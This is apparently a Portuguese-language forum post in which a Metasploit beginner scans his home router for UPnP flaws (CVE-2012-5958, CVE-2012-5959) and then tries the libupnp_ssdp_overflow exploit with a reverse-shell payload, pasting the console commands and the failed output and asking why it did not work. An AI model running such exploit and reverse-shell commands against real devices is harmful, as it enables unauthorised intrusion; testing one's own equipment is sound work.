Trash_Override
(usa Slackware)
Enviado em 16/02/2013 - 22:12h
Boa tarde pessoal,
Eu sou newbie em metasploit.
Esta tarde estava testando o roteador wireless aqui de casa utilizado o UPnP SSDP para procurar falhas
abaixo segue o SCAN:
UPnP SSDP M-SEARCH Information Discovery takes this alerts:
msf auxiliary(ssdp_msearch) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
msf auxiliary(ssdp_msearch) > run
[*] Sending UPnP SSDP probes to 192.168.1.1->192.168.1.1 (1 hosts)
[+] 192.168.1.1:1900 SSDP Linux/2.6.21, UPnP/1.0, Portable SDK for UPnP devices/1.3.1 |
http://192.168.1.1:49153/gatedesc.xml | uuid:75802409-bccb-40e7-8e6c-fa095ecce13e::upnp:rootdevice | vulns:1 (CVE-2012-5958, CVE-2012-5959)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssdp_msearch) >
Como existe uma falha tentei posteriormente utilizar um exploit abaixo segue o link
http://www.metasploit.com/modules/exploit/multi/upnp/libupnp_ssdp_overflow
Segue a saída. Gostaria de saber o porque não funcionou... alguém tem alguma idéia?
msf > use exploit/multi/upnp/libupnp_ssdp_overflow
msf exploit(libupnp_ssdp_overflow) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcp
msf exploit(libupnp_ssdp_overflow) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(libupnp_ssdp_overflow) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(libupnp_ssdp_overflow) > exploit
[*] Started reverse handler on 192.168.1.3:4444
[*] No target matches this fingerprint
[*]
[*] HTTP/1.1 200 OK
[*] CACHE-CONTROL: max-age=1800
[*] DATE: Sat, 16 Feb 2013 19:46:06 GMT
[*] EXT:
[*] LOCATION:
http://192.168.1.1:49153/gatedesc.xml
[*] SERVER: Linux/2.6.21, UPnP/1.0, Portable SDK for UPnP devices/1.3.1
[*] X-User-Agent: redsonic
[*] ST: upnp:rootdevice
[*] USN: uuid:75802409-bccb-40e7-8e6c-fa095ecce13e::upnp:rootdevice
[*]
[*]
[-] Exploit failed [no-target]: No compatible target detected
msf exploit(libupnp_ssdp_overflow) >
Agradeço desde já
abs